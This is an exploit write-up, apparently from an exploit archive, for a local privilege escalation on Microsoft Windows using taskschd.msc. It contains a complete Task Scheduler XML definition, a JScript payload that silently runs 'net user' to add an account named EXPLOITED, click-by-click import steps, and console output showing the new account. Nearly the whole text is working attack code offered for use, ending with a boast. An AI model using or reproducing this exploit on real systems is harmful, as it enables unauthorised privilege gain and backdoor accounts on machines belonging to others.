Microsoft Windows taskschd.msc Privilege Escalation

Microsoft Windows taskschd.msc local SYSTEM privilege escalation exploit.


MD5 | ab288ccfb8f8fa2781bea0902614d3f1

  Microsoft Windows 'taskschd.msc' 
Local SYSTEM Privilege Escalation

Todor Donev <[email protected]>
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Related exploit:
https://www.exploit-db.com/exploits/35850/


C:\Users\test\Desktop>net user

User accounts for \\ETHACK-PC

-------------------------------------------------------------------------------
Administrator Guest test
The command completed successfully.


C:\Users\test\Desktop>net user EXPLOITED /add
System error 5 has occurred.

Access is denied.


C:\Users\test\Desktop>

The user 'test' has no privileges to add user.
Okey! Let's hacking..

Now, we must create suidshell!

C:\Users\test\Desktop>type w00tw00t.xml

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo>
<Date>1337-01-01T13:37:07.9601296</Date>
<Author>NT-AUTHORITY\SYSTEM</Author>
</RegistrationInfo>
<Triggers />
<Principals>
<Principal id="Author">
<UserId>ETHACK-PC\test</UserId>
<LogonType>S4U</LogonType>
<RunLevel>HighestAvailable</RunLevel>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
<AllowHardTerminate>true</AllowHardTerminate>
<StartWhenAvailable>true</StartWhenAvailable>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>false</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>P3D</ExecutionTimeLimit>
<Priority>7</Priority>
<RestartOnFailure>
<Interval>PT1M</Interval>
<Count>3</Count>
</RestartOnFailure>
</Settings>
<Actions Context="Author">
<Exec>
<Command>%USERPROFILE%\Desktop\EXPLOIT.JS</Command>
</Exec>
</Actions>
</Task>

C:\Users\test\Desktop>type EXPLOIT.JS

suidshell = WScript.CreateObject("WScript.Shell");
suidshell.run("cmd.exe /c net user EXPLOITED EXPLOITED /add", 0);


Okey. Now, our PAYLOAD is ready for IMPORT in Task Scheduler v1.0

Run 'taskschd.msc' -> Import Task.. -> Select and Open: w00tw00t.xml -> Run


C:\Users\test\Desktop>net user

User accounts for \\ETHACK-PC

-------------------------------------------------------------------------------
Administrator EXPLOITED Guest
test
The command completed successfully.


C:\Users\test\Desktop>

OWNED.. I've got the powah.. :))

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